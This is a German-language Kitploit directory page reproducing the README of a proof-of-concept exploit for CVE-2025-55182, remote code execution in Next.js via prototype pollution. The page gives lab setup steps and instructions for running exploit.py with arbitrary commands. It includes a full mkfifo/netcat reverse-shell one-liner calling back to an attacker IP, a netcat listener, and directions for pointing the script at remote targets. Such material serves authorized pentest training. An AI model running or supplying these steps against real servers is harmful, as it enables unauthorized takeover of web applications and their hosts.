Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell-CVE-2025-55182 — Proof-of-Concept-Exploit für CVE-2025-55182, der Remote-Code-Ausführung in Next.js über Prototype Pollution demonstriert. Enthält ein vorkonfiguriertes verwundbares Labor für autorisierte Tests und Reverse-Shell-Generierung. | Kitploit
Tools/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFLernen & BildungLabs & Praxis
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

Proof-of-Concept-Exploit für CVE-2025-55182, der Remote-Code-Ausführung in Next.js über Prototype Pollution demonstriert. Enthält ein vorkonfiguriertes verwundbares Labor für autorisierte Tests und Reverse-Shell-Generierung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
3vor 9 MonatenNoch nicht geprüft
Teilen

React2Shell CVE-2025-55182

Ein Proof-of-Concept-Exploit, der eine Schwachstelle zur Remote-Codeausführung in Next.js-Anwendungen durch Prototype Pollution in der Rendering-Pipeline der React-Serverkomponenten demonstriert.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungs- und autorisierte Testzwecke gedacht. Die unbefugte Verwendung gegen Systeme, die dir nicht gehören oder für die du keine Erlaubnis zum Testen hast, ist illegal.

📋 Voraussetzungen

  • Node.js (v16 oder höher)
  • Python 3.6+
  • netcat (für Reverse Shells)
  • Eine angreifbare Next.js-Anwendung (im Repository enthalten)

🚀 Schnellstart

Option 1: Vorkonfiguriertes Labor verwenden

1. Das Repository klonen

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

Option 2: Server von Grund auf erstellen

root@kitploit:~
# Create a new Next.js app with the vulnerable version
npm create [email protected] react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab

Hinweis: Das vorkonfigurierte Labor enthält bereits den notwendigen angreifbaren Code. Wenn du von Grund auf erstellst, musst du die angreifbaren Komponenten manuell hinzufügen.

2. Abhängigkeiten installieren

root@kitploit:~
cd react2shell-lab
npm install

3. Den angreifbaren Server starten

In Terminal 1:

root@kitploit:~
npm run dev

Der Server sollte unter http://localhost:3000 starten.

🔧 Ausnutzung

Grundlegende Befehlsausführung

  1. Das Repository enthält eine Datei exploit.py, die die Schwachstelle demonstriert. Bearbeite die Variable COMMAND in der Datei und setze sie auf den gewünschten Befehl:

    root@kitploit:~
    COMMAND = 'whoami'  # Change this to any command you want to execute
    
  2. Führe den Exploit aus:

    root@kitploit:~
    python3 exploit.py
    

Reverse Shell

  1. Richte einen netcat-Listener in einem neuen Terminal ein:

    root@kitploit:~
    nc -nvlp 4444
    
  2. Bearbeite exploit.py und aktualisiere den Befehl auf dein Reverse-Shell-Payload:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
    

    Ersetze YOUR_IP durch die IP-Adresse deines lokalen Rechners.

  3. Führe den Exploit aus:

    root@kitploit:~
    python3 exploit.py
    

🛠️ Erweiterte Nutzung

Testen entfernter Ziele

Bearbeite die Variable HOST im Exploit-Skript, um entfernte Server als Ziel zu setzen:

root@kitploit:~
HOST = 'target-ip-address'  # Replace with target IP
PORT = 3000  # Default Next.js port

Häufige Befehle

  • Verzeichnisinhalt auflisten: ls -la
  • Systeminformationen abrufen: uname -a
  • Aktuellen Benutzer abrufen: whoami
  • Netzwerkinformationen abrufen: ifconfig oder ip a

🔍 Fehlerbehebung

  • Verbindung abgelehnt: Stelle sicher, dass der Zielserver läuft und erreichbar ist
  • Befehl nicht gefunden: Das Zielsystem verfügt möglicherweise nicht über bestimmte Binärdateien
  • Keine Ausgabe: Der Befehl wurde möglicherweise ausgeführt, hat aber keine Ausgabe erzeugt

📚 Referenzen

  • CVE-2025-55182
  • Next.js Security Advisories
  • Prototype Pollution in JavaScript

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – weitere Details findest du in der Datei LICENSE.

Diese Version fragt nach Benutzereingaben für entferntes Ziel sowie Angreifer-IPs und -Ports. Der Beitragstext (body_parts) ist in dieser Version ebenfalls leicht gekürzt.

Quellen:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

Tool herunterladen